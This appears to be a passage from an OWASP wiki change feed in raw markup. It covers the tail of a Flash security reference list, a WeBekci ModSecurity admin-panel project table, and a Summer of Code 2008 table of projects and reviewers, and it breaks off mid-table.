http://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html<br /> <br /> * The Flash Player Development Center Security Section: http://www.adobe.com/devnet/flashplayer/security.html<br /> <br /> * The Flash Player 9.0 Security Whitepaper: http://www.adobe.com/devnet/flashplayer/articles/flash_player_9_security.pdf<br /> <br /> '''Tools'''&lt;br&gt;<br /> <br /> * SWFIntruder: https://www.owasp.org/index.php/Category:SWFIntruder<br /> <br /> * Decompiler – Flare: http://www.nowrap.de/flare.html<br /> <br /> * Compiler – MTASC: &lt;http://www.mtasc.org/&gt;<br /> <br /> * Disassembler – Flasm: &lt;http://flasm.sourceforge.net/&gt;<br /> <br /> * Swfmill – Convert Swf to XML and vice versa: &lt;http://swfmill.org/&gt;<br /> <br /> * Debugger Version of Flash Plugin/Player: &lt;http://www.adobe.com/support/flash/downloads.html</div> Wisec https://wiki.owasp.org/index.php?title=Project_Information:Webekci&diff=33433 Project Information:Webekci 2008-07-04T16:32:22Z <p>Wisec: </p> <hr /> <div>{| style=&quot;width:100%&quot; border=&quot;0&quot; align=&quot;center&quot;<br /> ! colspan=&quot;7&quot; align=&quot;center&quot; style=&quot;background:#4058A0; color:white&quot;|&lt;font color=&quot;white&quot;&gt;'''PROJECT IDENTIFICATION''' <br /> |-<br /> | style=&quot;width:15%; background:#7B8ABD&quot; align=&quot;center&quot;|'''Project Name'''<br /> | colspan=&quot;6&quot; style=&quot;width:85%; background:#cccccc&quot; align=&quot;left&quot;|&lt;font color=&quot;black&quot;&gt;'''WeBekci''' <br /> |-<br /> | style=&quot;width:15%; background:#7B8ABD&quot; align=&quot;center&quot;| '''Short Project Description''' <br /> | colspan=&quot;6&quot; style=&quot;width:85%; background:#cccccc&quot; align=&quot;left&quot;|WeBekci tries to provide an admin panel that ModSecurity, which is an open source web application firewall that runs as an Apache module, lacks. &lt;br&gt; Web application firewalls (WAF) are gaining importance among the information security technologies designed to protect web sites from attack. WAF solutions prevent attacks that network firewalls and intrusion detection systems can't and they require no modification of application source code. ModSecurity is an embeddable web application firewall and it provides protection from a range of attacks against web applications. It is an open source project available to everyone; it however does not come with an admin panel. <br /> |-<br /> | style=&quot;width:15%; background:#7B8ABD&quot; align=&quot;center&quot;|'''Email Contacts'''<br /> | style=&quot;width:14%; background:#cccccc&quot; align=&quot;center&quot;|Project Leader&lt;br&gt;[mailto:bunyamin(at)owasp.org '''Bünyamin Demir''']<br /> | style=&quot;width:14%; background:#cccccc&quot; align=&quot;center&quot;|Project Contributors&lt;br&gt;[mailto:urgunb(at)hotmail.com '''Bedirhan Urgun''']&lt;br&gt;[mailto:christophe(at)vandeplas.com '''Christophe Vandeplas''']&lt;br&gt;[mailto:serrano.neves(at)gmail.com '''Eduardo Jorge'''] <br /> | style=&quot;width:14%; background:#cccccc&quot; align=&quot;center&quot;|[https://lists.owasp.org/mailman/listinfo/owasp-webekci '''Mailing List/subscribe''']&lt;br&gt;[mailto:Owasp-webekci@lists.owasp.org '''Mailing List/Use''']<br /> | style=&quot;width:14%; background:#cccccc&quot; align=&quot;center&quot;|First Reviewer&lt;br&gt;[mailto:afry(at)strongcrypto.biz '''Alex Fry''']&lt;br&gt;[http://www.linkedin.com/in/alexanderfry Profile]<br /> | style=&quot;width:14%; background:#cccccc&quot; align=&quot;center&quot;|Second Reviewer&lt;br&gt;[mailto:stefano.dipaola(at)@wisec.it '''Stefano Di Paola''']&lt;br&gt;[[User:Wisec|Profile]]<br /> | style=&quot;width:15%; background:#cccccc&quot; align=&quot;center&quot;|OWASP Board Member&lt;br&gt;(if applicable)&lt;br&gt;[mailto:name(at)name '''Name&amp;Email''']<br /> |}<br /> {| style=&quot;width:100%&quot; border=&quot;0&quot; align=&quot;center&quot;<br /> ! colspan=&quot;6&quot; align=&quot;center&quot; style=&quot;background:#4058A0; color:white&quot;|&lt;font color=&quot;white&quot;&gt;'''PROJECT MAIN LINKS''' <br /> |-<br /> | style=&quot;width:100%; background:#cccccc&quot; align=&quot;center&quot;|<br /> * WeBekci is a web based ModSecurity 2.x management tool and written in PHP with it's backend powered by MySQL. It can be found at [http://code.google.com/p/webekci/ WeBekci.]<br /> * (If appropriate, links to be added)<br /> |}<br /> {| style=&quot;width:100%&quot; border=&quot;0&quot; align=&quot;center&quot;<br /> ! colspan=&quot;6&quot; align=&quot;center&quot; style=&quot;background:#4058A0; color:white&quot;|&lt;font color=&quot;white&quot;&gt;'''SPONSORS &amp; GUIDELINES''' <br /> |-<br /> | style=&quot;width:50%; background:#cccccc&quot; align=&quot;center&quot;|[[OWASP Summer of Code 2008|Sponsor - '''OWASP Summer of Code 2008''']] <br /> | style=&quot;width:50%; background:#cccccc&quot; align=&quot;center&quot;|[[OWASP Summer of Code 2008 Applications - Need Futher Clarifications#OWASP-WeBekci_Project|'''Sponsored Project/Guidelines/Roadmap''']]<br /> |}<br /> {| style=&quot;width:100%&quot; border=&quot;0&quot; align=&quot;center&quot;<br /> ! colspan=&quot;5&quot; align=&quot;center&quot; style=&quot;background:#4058A0; color:white&quot;|ASSESSMENT AND REVIEW PROCESS<br /> |-<br /> | style=&quot;width:15%; background:#6C82B5&quot; align=&quot;center&quot;|'''Review/Reviewer''' <br /> | style=&quot;width:21%; background:#b3b3b3&quot; align=&quot;center&quot;|'''Author's Self Evaluation'''&lt;br&gt;(applicable for Alpha Quality &amp; further) <br /> | style=&quot;width:21%; background:#b3b3b3&quot; align=&quot;center&quot;|'''First Reviewer'''&lt;br&gt;(applicable for Alpha Quality &amp; further)<br /> | style=&quot;width:21%; background:#b3b3b3&quot; align=&quot;center&quot;|'''Second Reviewer'''&lt;br&gt;(applicable for Beta Quality &amp; further)<br /> | style=&quot;width:22%; background:#b3b3b3&quot; align=&quot;center&quot;|'''OWASP Board Member'''&lt;br&gt;(applicable just for Release Quality) <br /> |-<br /> | style=&quot;width:15%; background:#7B8ABD&quot; align=&quot;center&quot;|'''50% Review''' <br /> | style=&quot;width:21%; background:#C2C2C2&quot; align=&quot;center&quot;|Objectives &amp; Deliveries reached?&lt;br&gt;'''Yes/No''' (To update)&lt;br&gt;---------&lt;br&gt;[[Project Information:Webekci - 50 Review - Self Evaluation - A|See&amp;Edit: 50% Review/Self-Evaluation (A)]]<br /> | style=&quot;width:21%; background:#C2C2C2&quot; align=&quot;center&quot;|Objectives &amp; Deliveries reached?&lt;br&gt;'''Yes/No''' (To update)&lt;br&gt;---------&lt;br&gt;[[Project Information:Webekci - 50 Review - First Reviewer - C|See&amp;Edit: 50% Review/1st Reviewer (C)]]<br /> | style=&quot;width:21%; background:#C2C2C2&quot; align=&quot;center&quot;|Objectives &amp; Deliveries reached?&lt;br&gt;'''Yes/No''' (To update)&lt;br&gt;---------&lt;br&gt;[[Project Information:Webekci 50 Review Second Review E|See&amp;Edit: 50%Review/2nd Reviewer (E)]]<br /> | style=&quot;width:22%; background:#C2C2C2&quot; align=&quot;center&quot;|X <br /> |-<br /> | style=&quot;width:15%; background:#7B8ABD&quot; align=&quot;center&quot;|'''Final Review''' <br /> | style=&quot;width:21%; background:#C2C2C2&quot; align=&quot;center&quot;|Objectives &amp; Deliveries reached?&lt;br&gt;'''Yes/No''' (To update)&lt;br&gt;---------&lt;br&gt;What status has been reached?&lt;br&gt;'''Season of Code''' - (To update)&lt;br&gt;---------&lt;br&gt;[[Project Information:Webekci - Final Review - Self Evaluation - B|See&amp;Edit: Final Review/SelfEvaluation (B)]]<br /> | style=&quot;width:21%; background:#C2C2C2&quot; align=&quot;center&quot;|Objectives &amp; Deliveries reached?&lt;br&gt;'''Yes/No''' (To update)&lt;br&gt;---------&lt;br&gt;What status has been reached?&lt;br&gt;'''Season of Code''' - (To update)&lt;br&gt;---------&lt;br&gt;[[Project Information:Webekci - Final Review - First Reviewer - D|See&amp;Edit: Final Review/1st Reviewer (D)]]<br /> | style=&quot;width:21%; background:#C2C2C2&quot; align=&quot;center&quot;|Objectives &amp; Deliveries reached?&lt;br&gt;'''Yes/No''' (To update)&lt;br&gt;---------&lt;br&gt;What status has been reached?&lt;br&gt;'''Season of Code''' - (To update)&lt;br&gt;---------&lt;br&gt;[[Project Information:Webekci - Final Review - Second Reviewer - F|See&amp;Edit: Final Review/2nd Reviewer (F)]]<br /> | style=&quot;width:22%; background:#C2C2C2&quot; align=&quot;center&quot;|Objectives &amp; Deliveries reached?&lt;br&gt;'''Yes/No'''(To update)&lt;br&gt;---------&lt;br&gt;Which status has been reached?&lt;br&gt;'''Season of Code'''(To update)&lt;br&gt;---------&lt;br&gt;[[Project Information:Webekci - Final Review - OWASP Board Member - G|See/Edit: Final Review/Board Member&lt;br&gt; (G)]]<br /> |-<br /> |}</div> Wisec https://wiki.owasp.org/index.php?title=OWASP_Summer_of_Code_2008_Projects_Authors_Status_Target_and_Reviewers&diff=33432 OWASP Summer of Code 2008 Projects Authors Status Target and Reviewers 2008-07-04T16:24:59Z <p>Wisec: /* TOOLS PROJECTS */</p> <hr /> <div>This page contains Projects, Authors, Status Target and Reviewers of the sponsored programme [[OWASP Summer of Code 2008]].&lt;br&gt;<br /> '''* Please note: The reviewers with the reference ‘Confirmed’ were only confirmed by projects’ authors and are still waiting for OWASP Board confirmation.'''<br /> <br /> == DOCUMENTATION PROJECTS ==<br /> {| class=&quot;wikitable&quot; style=&quot;text-align:center&quot;<br /> ! width=&quot;600&quot; height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | Application<br /> ! width=&quot;220&quot; align=&quot;CENTER&quot; | '''Author'''<br /> ! width=&quot;60&quot; align=&quot;CENTER&quot; | [[:Category:OWASP Project Assessment|'''Status Target''']]<br /> ! width=&quot;108&quot; align=&quot;CENTER&quot; | '''1st&lt;br&gt;Reviewer'''<br /> ! width=&quot;108&quot; align=&quot;CENTER&quot; | '''2nd&lt;br&gt;Reviewer '''<br /> ! width=&quot;108&quot; align=&quot;CENTER&quot; | '''OWASP&lt;br&gt;Board&lt;br&gt;Reviewer<br /> '''<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Application Security Verification Standard Project|OWASP Application Security Verification Standard]]'''<br /> | align=&quot;CENTER&quot; | Mike Boberski <br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:jeff.williams(at)owasp.org Jeff Williams]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:pierre.parrend(at)insa-lyon.fr Pierre Parrend]&lt;br&gt;[http://www.rzo.free.fr Curriculum]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP AppSensor Project|OWASP AppSensor - Detect and Respond to Attacks from Within the Application]]'''<br /> | align=&quot;CENTER&quot; | [mailto:michael.coates(at)aspectsecurity.com Michael Coates]<br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:eric.sheridan(at)aspectsecurity.com Eric Sheridan]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:thrynn404(at)gmail.com Randy Janinda]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Backend Security Project|OWASP Backend Security Project]]'''<br /> | align=&quot;CENTER&quot; | Carlo Pelliccioni<br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:kisero(at)gmail.com Esteban Ribičić]&lt;br&gt;[http://docs.google.com/Doc?id=df9vbj96_120fzfj4kfk Curriculum]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | JS&lt;br&gt;(TBC)<br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Classic ASP Security Project|OWASP Classic ASP Security Project]]'''<br /> | align=&quot;CENTER&quot; | Juan Carlos Calderon<br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:kisero(at)gmail.com Esteban Ribičić]&lt;br&gt;[http://docs.google.com/Doc?id=df9vbj96_120fzfj4kfk Curriculum]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:andres(at)neurofuzz.com Andres Andreu]&lt;br&gt;(TBC)<br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Code Review Project|OWASP Code review guide, V1.1]]'''<br /> | align=&quot;CENTER&quot; | Eoin Keary<br /> | align=&quot;CENTER&quot; | Quality<br /> | align=&quot;CENTER&quot; | [mailto:rahim.jina@ie.ey.com Rahim Jina]&lt;br&gt;[[OWASP Summer of Code 2008 Projects Authors Status Target and Reviewers Rahim Jina Curriculum|Curriculum]]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:psatishkumar(at)gmail.com P.Satish Kumar]&lt;br&gt;[https://www.owasp.org/index.php/User:Satishkumar Curriculum]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | Jeff Williams<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:OWASP Corporate Application Security Rating Guide|OWASP Corporate Application Security Rating Guide]]'''<br /> | align=&quot;CENTER&quot; | Parvathy Iyer<br /> | align=&quot;CENTER&quot; | Quality<br /> | align=&quot;CENTER&quot; | [mailto:nkirschner@eisnerllp.com Neal Kirschner]&lt;br&gt;[[OWASP Summer of Code 2008 Projects Authors Status Target and Reviewers Neal Kirschner Curriculum|Curriculum]]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:Omar.Sherin(at)infosec2.com Omar Sherin]&lt;br&gt;TBC <br /> | align=&quot;CENTER&quot; | <br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Education Project|OWASP Education Project]]'''<br /> | align=&quot;CENTER&quot; | Martin Knobloch<br /> | align=&quot;CENTER&quot; | Quality<br /> | align=&quot;CENTER&quot; | [mailto:sebastien.gioria@owasp.fr Sebastien Gioria]&lt;br&gt;[http://www.linkedin.com/in/gioria Curriculum]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:namn(at)bluemoon.com.vn Nam Nguyen]&lt;br&gt;[[OWASP Summer of Code 2008 Projects Authors Status Target and Reviewers Nguyen Curriculum|Curriculum]]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | <br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:OWASP Internationalization|OWASP Internationalization Guidelines Project]]'''<br /> | align=&quot;CENTER&quot; | Juan Carlos Calderon <br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:fabio.e.cerullo(at)aib.ie Fabio Cerullo]&lt;br&gt;[https://www.owasp.org/index.php/User:Fabio.e.cerullo Curriculum]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:rodrigo(at)rmarcos.com Rodrigo Marcos]&lt;br&gt;[https://www.owasp.org/index.php/User:Rodrigo.marcos Curriculum]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP .NET Project#OWASP .NET Project Leader|OWASP .NET Project Leader]]'''<br /> | align=&quot;CENTER&quot; | Mark Roxberry <br /> | align=&quot;CENTER&quot; | Quality<br /> | align=&quot;CENTER&quot; | [mailto:eoinkeary(at)gmail.com Eoin Keary]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:dennis.hurst(at)hp.com Dennis Hurst]&lt;br&gt;TBC<br /> | align=&quot;CENTER&quot; | Dinis Cruz<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Positive Security Project|OWASP Positive Security Project]]'''<br /> | align=&quot;CENTER&quot; | Eduardo Vianna de Camargo Neves <br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:welias(at)conviso.com.br Wagner Elias]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:ken(at)krvw.com Kenneth Wyk]&lt;br&gt;TBC<br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Ruby on Rails Security Guide V2|OWASP Ruby on Rails Security Guide v2]]'''<br /> | align=&quot;CENTER&quot; | Heiko Webers <br /> | align=&quot;CENTER&quot; | Quality<br /> | align=&quot;CENTER&quot; | [mailto:jons0022-at-unf.edu Steve Jones]&lt;br&gt; [https://www.owasp.org/index.php/OWASP_Summer_of_Code_2008_Projects_Authors_Status_Target_and_Reviewers_Steve_Jones_Background Profile]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:jeff.cabaniss(at)gmail.com Jeff Cabaniss]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; |<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Securing WebGoat using ModSecurity Project|OWASP Securing WebGoat using ModSecurity]]'''<br /> | align=&quot;CENTER&quot; | Stephen Evans <br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:ivan.ristic(at)breach.com Ivan Ristic] &amp; Breach Group&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:christian.folini(at)netnea.com Christian Folini]&lt;br&gt;[http://www.netnea.com/cms/?q=christian_folini Curriculum]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot;|'''[[:Category:OWASP Source Code Review OWASP Projects Project|OWASP Source Code Review OWASP Projects]]'''<br /> | align=&quot;CENTER&quot; | James Walden<br /> | align=&quot;CENTER&quot; | Quality<br /> | align=&quot;CENTER&quot; | [mailto:afry(at)strongcrypto.biz Alexander Fry]&lt;br&gt;[http://www.linkedin.com/in/alexanderfry Profile]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:marco.m.morana(at)gmail.com Marco M. Morana]&lt;br&gt;[[OWASP Summer of Code 2008 Projects Authors Status Target and Reviewers Marco M Morana Curriculum|Curriculum]]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | <br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:OWASP Spanish|OWASP Spanish Project]]'''<br /> | align=&quot;CENTER&quot; | Juan Carlos Calderon <br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:fabio.e.cerullo(at)aib.ie Fabio Cerullo]&lt;br&gt;[https://www.owasp.org/index.php/User:Fabio.e.cerullo Curriculum]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:rodrigo(at)rmarcos.com Rodrigo Marcos]&lt;br&gt;[https://www.owasp.org/index.php/User:Rodrigo.marcos Curriculum]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Testing Project|OWASP Testing Guide v3]]'''<br /> | align=&quot;CENTER&quot; | Matteo Meucci <br /> | align=&quot;CENTER&quot; | Quality<br /> | align=&quot;CENTER&quot; | [mailto:namn@bluemoon.com.vn Nam Nguyen]&lt;br&gt;[[OWASP Summer of Code 2008 Projects Authors Status Target and Reviewers Nguyen Curriculum|Curriculum]]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:KFuller@dmv.ca.gov Kevin Fuller]&lt;br&gt;[[OWASP Summer of Code 2008 Projects Authors Status Target and Reviewers Fuller Curriculum|Curriculum]]&lt;br&gt;(Confirmed) <br /> | align=&quot;CENTER&quot; |<br /> |}<br /> <br /> {| class=&quot;wikitable&quot; style=&quot;text-align:center&quot;<br /> ! width=&quot;400&quot; height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | Application<br /> ! width=&quot;120&quot; align=&quot;CENTER&quot; | '''Author'''<br /> ! width=&quot;60&quot; align=&quot;CENTER&quot; | [[:Category:OWASP Project Assessment|'''Status Target''']]<br /> ! width=&quot;108&quot; align=&quot;CENTER&quot; | '''1st&lt;br&gt;Reviewer'''<br /> ! width=&quot;108&quot; align=&quot;CENTER&quot; | '''2nd&lt;br&gt;Reviewer '''<br /> ! width=&quot;108&quot; align=&quot;CENTER&quot; | '''3rd&lt;br&gt;Reviewer '''<br /> ! width=&quot;108&quot; align=&quot;CENTER&quot; | '''4th&lt;br&gt;Reviewer '''<br /> ! width=&quot;108&quot; align=&quot;CENTER&quot; | '''OWASP&lt;br&gt;Board&lt;br&gt;Reviewer<br /> '''<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP ASDR Project|OWASP Application Security Desk Reference (ASDR)]]'''<br /> | align=&quot;CENTER&quot; | Leonardo Cavallari Militelli <br /> | align=&quot;CENTER&quot; | Quality<br /> | align=&quot;CENTER&quot; | [mailto:williamtsmith(at)gmail.com William Smith]&lt;br&gt;[[OWASP SoC 2008 ASDR Reviewers#William Smith | Bio]]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:ken(at)krvw.com Kenneth Wyk]&lt;br&gt;[[OWASP SoC 2008 ASDR Reviewers#Kenneth R. van Wyk| Bio]]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:kcfredman(at)gmail.com Frederick Donovan]&lt;br&gt;[[OWASP SoC 2008 ASDR Reviewers#Frederick Donovan | Bio]]&lt;br&gt; (Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:Darren.Challey(at)ge.com Darren W. Challey]&lt;br&gt;[[OWASP SoC 2008 ASDR Reviewers#Darren W. Challey | Bio]]&lt;br&gt; (Confirmed)<br /> | align=&quot;CENTER&quot; | Jeff Williams&lt;br&gt;(Confirmed)<br /> |}<br /> <br /> == TOOLS PROJECTS ==<br /> {| class=&quot;wikitable&quot; style=&quot;text-align:center&quot;<br /> ! width=&quot;600&quot; height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | Application<br /> ! width=&quot;220&quot; align=&quot;CENTER&quot; | '''Author'''<br /> ! width=&quot;60&quot; align=&quot;CENTER&quot; | [[:Category:OWASP Project Assessment|'''Status Target''']]<br /> ! width=&quot;108&quot; align=&quot;CENTER&quot; | '''1st&lt;br&gt;Reviewer'''<br /> ! width=&quot;108&quot; align=&quot;CENTER&quot; | '''2nd&lt;br&gt;Reviewer '''<br /> ! width=&quot;108&quot; align=&quot;CENTER&quot; | '''OWASP&lt;br&gt;Board&lt;br&gt;Reviewer<br /> '''<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:GTK plus GUI for w3af Project|GTK+ GUI for w3af project]]'''<br /> | align=&quot;CENTER&quot; | Facundo Batista<br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:andres.riancho(at)gmail.com Andres Riancho]&lt;br&gt;[http://www.linkedin.com/in/ariancho Profile]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:ah(at)securenet(dot)de Achim Hoffmann]&lt;br&gt;[https://www.owasp.org/index.php/User:Achim Profile]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Access Control Rules Tester Project|OWASP Access Control Rules Tester]]'''<br /> | align=&quot;CENTER&quot; | Andrew Petukhov<br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:caughron(at)gmail.com Mat Caughron]&lt;br&gt;[http://www.linkedin.com/pub/1/A84/998 Profile]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:mg_chen(at)yahoo.com Min Chen]&lt;br&gt;[http://www.linkedin.com/in/mgchen Profile]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP AntiSamy Project .NET| OWASP AntiSamy .NET]]'''<br /> | align=&quot;CENTER&quot; | Arshan Dabirsiaghi<br /> | align=&quot;CENTER&quot; | Quality<br /> | align=&quot;CENTER&quot; | [mailto:kisero(at)gmail.com Esteban Ribičić]&lt;br&gt;[http://docs.google.com/Doc?id=df9vbj96_120fzfj4kfk Curriculum]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:yiannis(at)owasp.org Yiannis Pavlosoglou]&lt;br&gt;(TBC)<br /> | align=&quot;CENTER&quot; | Jeff Williams<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Application Security Tool Benchmarking Environment and Site Generator Refresh Project|OWASP Application Security Tool Benchmarking Environment and Site Generator refresh]]'''<br /> | align=&quot;CENTER&quot; | Dmitry Kozlov<br /> | align=&quot;CENTER&quot; | Quality<br /> | align=&quot;CENTER&quot; | [mailto:mark.roxberry(at)owasp.org Mark Roxberry]&lt;br&gt;[http://www.linkedin.com/in/roxberry Profile]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:medelibero(at)gmail.com Mike de Libero]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | Dinis Cruz<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Code Crawler|OWASP Code Crawler ]]'''<br /> | align=&quot;CENTER&quot; | Alessio Marziali <br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:eoinkeary@gmail.com Eoin Keary]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:dinis.cruz(at)owasp.org Dinis Cruz]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Interceptor Project|OWASP Interceptor Project - 2008 Update]]'''<br /> | align=&quot;CENTER&quot; | Justin Derry<br /> | align=&quot;CENTER&quot; | Quality<br /> | align=&quot;CENTER&quot; | [mailto:ngreen16(at)yahoo.com Nathan Green]&lt;br&gt;[https://www.owasp.org/index.php/User:Ngreen16 Profile]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:kisero(at)gmail.com Esteban Ribičić]&lt;br&gt;[http://docs.google.com/Doc?id=df9vbj96_120fzfj4kfk Curriculum]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | <br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP JSP Testing Tool Project|OWASP UI Component Verification Project (a.k.a. OWASP JSP Testing Tool)]]'''<br /> | align=&quot;CENTER&quot; | Jason Li<br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:markkerzner(at)gmail.com Mark Kerzner]&lt;br&gt;[http://www.linkedin.com/in/markkerzner Profile]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:fabricio.fujikawa(at)infoglobo.com.br Fabrício Fujikawa]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Live CD 2008 Project|OWASP Live CD 2008 Project]]'''<br /> | 